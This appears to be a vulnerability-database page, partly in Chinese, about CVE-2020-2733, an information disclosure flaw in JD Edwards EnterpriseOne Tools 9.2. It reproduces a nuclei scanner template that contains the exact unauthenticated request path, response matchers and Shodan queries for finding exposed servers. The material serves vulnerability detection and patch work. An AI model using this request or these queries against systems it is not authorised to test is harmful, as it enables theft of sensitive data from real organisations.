CVE-2020-2733: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure

日期: 2025-08-01 | 影响软件: JD Edwards EnterpriseOne Tools 9.2 | POC: 已公开

漏洞描述

JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2020-2733

info:
  name: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://redrays.io/cve-2020-2733-jd-edwards/
    - https://www.oracle.com/security-alerts/cpuapr2020.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-2733
    epss-score: 0.88054
    epss-percentile: 0.99455
    cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: jd_edwards_enterpriseone_tools
    shodan-query:
      - port:8999 product:"Oracle WebLogic Server"
      - port:8999 product:"oracle weblogic server"
  tags: cve2020,cve,oracle,weblogic,disclosure,exposure

http:
  - method: GET
    path:
      - '{{BaseURL}}/manage/fileDownloader?sec=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ACHCJK'

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 490a00463044022032fc0fb77f7275ee6b0162f7d85da5a49388169b8a69efbc68e017afe129933b022040efa72702dd99e21f0c8f509d4b2dde3af66fcea2062b22a2025314179bcb83:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-2733.yaml

相关漏洞推荐